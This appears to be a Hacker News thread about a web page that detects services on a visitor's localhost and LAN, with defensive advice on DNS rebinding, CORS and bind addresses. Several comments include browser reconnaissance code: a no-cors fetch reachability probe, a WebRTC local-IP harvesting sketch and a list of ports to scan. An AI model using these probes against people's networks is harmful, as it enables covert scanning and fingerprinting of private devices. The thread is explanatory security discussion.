Can anyone explain what kinds of attacks are possible here? A malicious script on this website can identify that a service is running on a particular endpoint (IP + port), and depending on the server's CORS policy, the script may be able to submit HTTP requests to that service... am I getting it right? I can see how that might be dangerous if the service responds to simple GET requests with sensitive information, or has a well-documented REST API and no authentication. Is this the scope of the vulnerability, or is there more to it?

I tried this with a few different services running on my machine (a one-liner WEBrick server in Ruby, Syncthing, a plain-text accounting program calling beancount, etc. etc.) and the script didn't detect any. I take it that means that these services all don't allow CORS?
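To the first question: yes, that's roughly the scope, with one subtlety. Detection doesn't strictly need CORS at all; a page can issue a request and distinguish "something answered" from "connection refused / timed out", and CORS only gates reading the response body. A rough sketch of that probe (function and option names are mine, not from the article; in a browser you'd pass { mode: 'no-cors' } via fetchInit so the promise resolves opaquely whenever any HTTP server answers):

```javascript
// Probe a URL: resolve true if an HTTP response of some kind arrived,
// false if the connection was refused, timed out, or wasn't HTTP.
// In a browser, pass { fetchInit: { mode: 'no-cors' } } so a server
// without CORS headers still counts as reachable: the response is
// opaque, but its arrival leaks that a server exists.
async function isReachable(url, { timeoutMs = 2000, fetchInit = {} } = {}) {
  const ctrl = new AbortController();
  const timer = setTimeout(() => ctrl.abort(), timeoutMs);
  try {
    await fetch(url, { ...fetchInit, signal: ctrl.signal });
    return true;   // something answered
  } catch {
    return false;  // refused, unreachable, aborted, or not HTTP
  } finally {
    clearTimeout(timer);
  }
}
```

So services without CORS may still be detectable as present; what CORS prevents is reading their responses (which matches what you saw: no CORS, no data).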



I wrote some code a while back to find and detect other devices on your network, although it no longer seems to work on Safari: http://joevennix.com/lan-js/examples/dashboard.html

The fingerprinting db it used can be found in the repo: https://github.com/joevennix/lan-js/blob/master/src/db.js


Can anyone share what measures we can take as web developers to secure local development environment?


Custom DNS server with DNS rebind protection. E.g. if you’re running OpenWRT you’re fine[1].

Also, just don't test on localhost. You can use a proper domain (or claim one in the .test TLD[2] if you're fine with self-signed certs) and point it to localhost.

If you’re going to use any redirect flow like OAuth/OpenID you’re going to need this for testing eventually anyway.

[1] https://openwrt.org/docs/guide-user/base-system/dhcp

[2] https://en.wikipedia.org/wiki/.test


What do you recommend if you're running a local server? E.g., I've developed programs before with the assumption that the user will be running them either on their local machine, or perhaps on their local network.

Think self-hosted wiki/etc. I was never sure (and thus have yet to properly implement it) what would be secure but also good UX. Normal auth + self-signed HTTPS would be simplest, I imagine, but I'm not clear whether browsers widely accept that. I recall Sandstorm having issues in this area, and it required a domain to fully run properly. Which seems... complex for a minimal install requirement.

Thoughts?


I actually wanted to do something similar one time and I figured there’s one way to do it:

1) Get a domain name for the project, e.g. mycoolwiki.tld

2) In the installer/setup provision for the user a random subdomain, e.g. d2c8116f19d0.mycoolwiki.tld

3) Use Let’s Encrypt DNS method to provision cert

4) Redirect d2c8116f19d0.mycoolwiki.tld to LAN IP

It’s not ideal because you need some external infrastructure and it assumes no DNS rebind protection.

However, if your webapp has a client and a server, that is, communicates via API only, you can actually do a lot better:

4) Set up the local server to accept CORS requests from d2c8116f19d0.mycoolwiki.tld only

5) Host client at d2c8116f19d0.mycoolwiki.tld

Additionally,

6) Make the client a PWA with offline support

and/or

6) Offer browser extension to use local copy of the client when user visits ∗.mycoolwiki.tld

Though for my use case I actually wanted to have ∗.mycoolwiki.tld/ipfs/<hash> be backed by IPFS and offer generic extension that both verifies that the IPFS gateway is playing nice and (if configured) redirect to local gateway.

Also offering Electron client instead of browser would work as well and saves you getting the cert.


> Custom DNS server with DNS rebind protection. E.g. if you’re running OpenWRT you’re fine[1].

One (very) easy way to achieve this is to use dnsmasq as a local caching server and pass it the option --stop-dns-rebind
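For reference, the same thing in config-file form (a minimal sketch; mydevbox.test is a made-up example domain):

```
# /etc/dnsmasq.conf
# Drop upstream answers that point at private (RFC 1918) ranges,
# which is what enables DNS rebinding attacks:
stop-dns-rebind
# ...but still allow names you deliberately point at your LAN:
rebind-domain-ok=/mydevbox.test/
# ...and exempt 127.0.0.0/8 answers (some services, e.g. DNSBLs, rely on them):
rebind-localhost-ok
```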


For folks on Linux: run it in a dedicated network namespace (mount and IPC namespaces are next in priority).


don't set up CORS in dev


I was surprised to notice that this page correctly found my local network IP address, and was thus able to query the correct network range. I have disabled WebRTC [0] now in Firefox (media.peerconnection.enabled is now false), but the page still tries the same range. Is there any other way they can get my local network IP?

[0] https://stackoverflow.com/a/26850789
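For context on the WebRTC route: pages harvest the local address from ICE candidates, which require no permission prompt. The parsing half is just a regex (sketched below; the browser half only runs in a browser, so it's shown in comments). Modern browsers increasingly replace the host address with an mDNS name like xxxxxxxx.local, which leaks nothing. With WebRTC disabled, the page is probably just falling back to guessing common ranges like 192.168.0.0/24 and 192.168.1.0/24.

```javascript
// Extract a private IPv4 address from an ICE candidate line.
// Classic (pre-mDNS) candidates look like:
//   "candidate:842163049 1 udp 1677729535 192.168.1.34 53594 typ host ..."
function localIpFromCandidate(candidate) {
  const m = candidate.match(/(\d{1,3}(?:\.\d{1,3}){3})/);
  return m ? m[1] : null;
}

// Browser-only harvesting side (sketch, won't run outside a browser):
//   const pc = new RTCPeerConnection({ iceServers: [] });
//   pc.createDataChannel('');
//   pc.onicecandidate = e => {
//     if (e.candidate) console.log(localIpFromCandidate(e.candidate.candidate));
//   };
//   pc.createOffer().then(offer => pc.setLocalDescription(offer));
```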


Here's the tl;dr

  app.use(cors());
defaults to Access-Control-Allow-Origin: *

If you know how CORS works, you already know that even if the resource is on localhost, it's open to any web page, including ones not on localhost. You won't find anything enlightening here.

If you don't know how CORS works but you're using the Express middleware for it anyway, read the documentation: https://expressjs.com/en/resources/middleware/cors.html#conf...
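And if a local server genuinely needs CORS, scope it to known origins instead of *. A minimal sketch of the decision (the helper name is mine; with the Express middleware it's just app.use(cors({ origin: ['http://localhost:3000'] }))):

```javascript
// Echo the request's Origin header back only when it is on an explicit
// allow list; returning null means "send no CORS header at all", so the
// browser refuses to hand the response to cross-origin pages.
function corsHeaderFor(requestOrigin, allowedOrigins) {
  return allowedOrigins.includes(requestOrigin) ? requestOrigin : null;
}
```

The point is that Access-Control-Allow-Origin: * on anything bound to localhost hands your local services to every page you visit.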


Some time ago, I made something using a similar technique to redirect to router configuration pages. I used WebRTC to get the local IPv4, then spawned a worker and timed it; if it came back fast, I assumed it was there and redirected the user, otherwise I tried a different common "router" address. I was unaware of DNS rebinding at the time.



Also if you are a front end developer and are on an insecure WiFi (coworking space or public WiFi) make sure you only bind to localhost.

Otherwise other people on the network can see your frontend code, which you are probably compiling with sourcemaps, which will give the attacker almost the complete source code of your SPA.


But frontend applications expose mangled javascript which can be reverse engineered anyway


It can be done, but it is usually uglified. No need to give the plain source to outsiders.


His demo did not work, so his message does not really get across. Maybe there were ways to exploit it, but if so, he failed. I got a CORS rejection.


The demo may not have worked for you, but it does work and works for many other people. Just because your particular browser is secured does not mean the author failed.


This just reminds me why I use Vagrant and only run a local webserver while I'm actually doing development work on it.


Funny enough, the site is reporting port 3000 to be running a web server. It is not, according to nmap and my knowledge.

Any ideas on this?


If, like me, you saw the bright red text "If you see any results like localhost:3000 is available!" as meaning :3000 was actually available: it's just an example. The yellow box above seems to be where the results would actually be.


I must admit, it was exactly this. I read the text without using my brain properly.

Please accept my sincere apologies.


I did exactly the same thing and spent too long running various things to find out what on Earth was using the port! That's the only reason I had a good guess at what it may have been.


If you're on Linux, BSD, or macOS, you can run:

    sudo lsof -i | grep 3000
To try and see if a process has claimed the port.

On Windows:

    netstat -ab
I've forgotten so much Windows I don't know how to filter the result, but it'll give you a list of ports and processes.


Some BSD systems won't have lsof out of the box, in which case fstat/netstat will give you the results you want.


I only get "Scanning localhost ... unreachable.", and there are at least 3 web servers active on the network.


Do you have WebRTC disabled? I disable it in Firefox and it breaks this test.


No, default Chrome settings.


Firejail allows for the creation of sandboxed interfaces, which include the ability to block local network access.


In the source code, he is attempting to serve images from http://localhost:4000/

It looks like a mistake because the image URLs are unlikely to exist on YOUR localhost at port 4000 when you load the page.


So does this mean that if I'm running a local dev machine with un-bundled source code on my company computer:

Any person that joins the wifi network and goes to a website that sniffs this out will have access to my computer's local server?


Depends what server software you're running and how it's configured. The specific configuration element you want to look for is usually called the "bind address". If it's set to something other than "127.0.0.1" then it will probably accept external connections.

If you know the port number your server is running on, you can also open up command prompt / terminal and check with "netstat -an". Look at the local address column and make sure your web server is listening on 127.0.0.1.
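If you're checking a lot of output, the test on the local-address column is simple (my own helper; it assumes the two common spellings, 127.0.0.1:8080 on Linux/Windows and BSD-style 127.0.0.1.8080 / *.8080):

```javascript
// True if a netstat "Local Address" entry is bound to loopback only.
// "0.0.0.0:8080", "*.8080" and ":::8080" all accept external connections.
function isLoopbackOnly(localAddr) {
  return /^(127\.|\[::1\]|::1[.:]|localhost[.:])/.test(localAddr);
}
```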


Appreciate the insight. Looks like I see:

  tcp4  0  0  *.8080  *.*  LISTEN

Local address being (*.8080)


> It is not sufficient security to only bind to 127.0.0.1 (the “loopback interface”)

What would be a better, more secure thing to do when you have multiple web servers on one machine behind a SSL-terminating reverse proxy?


The thing to do is not run a web browser on that machine. Run the servers in a VM.


But this seems to be able to see servers accessible to the local machine, so if my dev server in a VM is accessible from my browser, it's accessible to any webpage in my browser?


The reverse proxy is accessible from your browser and is properly configured to not accept random requests from any webpage (See: CORS). The others are not directly accessible, but only through the reverse proxy server. Does that make sense?


Not really, no. I still don't see what the reverse proxy or the VM are bringing to the table here. If I'm understanding the necessary CORS config here, it's simply to not send any Access-Control-Allow-Origin header, which does not require a VM or reverse proxy; most HTTP services do that by default.

Simply being accessed through a reverse proxy instead of directly doesn't add any additional security.


Actually, you are right.


I covered how he is doing this here: https://tryhackme.com/room/xss#6 (Look at all the tasks first)


Does this not work on mobile? I’m not seeing any of my web services show up on my server when opening this page in iOS Safari.

EDIT: In fact the status of local network scan doesn’t come up at all.


On my machine the requests seem to go out but the browser blocks the responses... which seems weird; I'd have expected the opposite (the browser blocking outgoing).


I expected to see my servers exposed, but... https://imgur.com/a/hjBaYbG


Would this have implications for people who use Cryptomator, which uses loopback connections to a local WebDAV drive in order to encrypt/decrypt files?


I had used that extension for quite a long time, but I removed it immediately after seeing this news!


I wonder if you could use the websocket API to scan for other (non-http) open ports.


And why?


I use NoScript, you can't see shit.


Here's a port scanning technique that doesn't use javascript:

https://blog.jeremiahgrossman.com/2006/11/browser-port-scann...


This is not helpful, because only an extremely small proportion of Web users run NoScript, and nor should they have to.


> This is not helpful, because only an extremely small proportion of Web users run NoScript, and nor should they have to.

Most (non-technical) Web users also don't run their own web servers, so they aren't affected. Among technical users, the proportion with NoScript is probably not as small.


Their routers do, along with an ever growing number of IoT devices people happily hook up to their WiFi without a second thought.

Given the long and gory history of companies releasing insecure-by-default devices, methods like this are a legitimate entry point into a network.


Most users have a modem or router that comes with a web interface, like just about everything in the internet of things.


That's like saying that people shouldn't have to run ad blockers, that instead ad networks should behave. Sit and wait.


You can't see shit either


Yes, he can: he will see the modern equivalent of "This site is best viewed in Internet Explorer", which in 2019 becomes "Please enable Javascript to view this page".


Honestly, such notices are shockingly unusual - most of the time (at least for the sites I encounter) they don't bother with <noscript>, you just get a broken and/or blank page.

I mostly use the web for reading blogs and articles, so the loss of dynamic sites isn't troublesome, but that's certainly not true for most users.

(Edit: some numerical context: I have enabled JavaScript for 194 sites over the last five years, whereas I encounter several new sites daily.)


I also browse with noscript all the time and I get them quite often. Mostly on product landing pages and Show HN demos.


Hmm, I wonder if it's confirmation bias on my end, or just a difference in what pages we each view.


> Hmm, I wonder if it's confirmation bias on my end, or just a difference in what pages we each view.

Yes.

Joking aside, I will add that I've been a NoScript/FlashBlock user for quite some time (more than a decade? I honestly can't remember), and while I run into some things that are frustrating (just had to disable NoScript for a tab to order plane tickets), it is refreshingly uncommon.

Yes, you can browse with default deny to JS and Flash.


Actually, they can: even if you enable JS, NoScript's ABE will prevent this attack: https://en.wikipedia.org/wiki/NoScript#Application_Boundarie...


Not anymore. It's not included in modern versions (after the changes in Add-Ons for Firefox's Quantum update).


That was actually funny


I only run local servers on ports 8080, 9090, 9191, 8081, 8082, and 8083. So scanning only on 3000 is a bit narrow...


It's not scanning only port 3000:

    const portsToTry = [
      80, 81, 88,
      3000, 3001, 3030, 3031, 3333,
      4000, 4001, 4040, 4041, 4444,
      5000, 5001, 5050, 5051, 5555,
      6000, 6001, 6060, 6061, 6666,
      7000, 7001, 7070, 7071, 7777,
      8000, 8001, 8080, 8081, 8888,
      9000, 9001, 9090, 9091, 9999,
    ];
view-source:http://http.jameshfisher.com/2019/05/26/i-can-see-your-local... :125


It does not only scan 3000. From the source code:

      const portsToTry = [
        80, 81, 88,
        3000, 3001, 3030, 3031, 3333,
        4000, 4001, 4040, 4041, 4444,
        5000, 5001, 5050, 5051, 5555,
        6000, 6001, 6060, 6061, 6666,
        7000, 7001, 7070, 7071, 7777,
        8000, 8001, 8080, 8081, 8888,
        9000, 9001, 9090, 9091, 9999,
      ];


On my machine it seems to be scanning for lots of ports between :80 and :9999. I think it's using 3000 as an example in the text only.



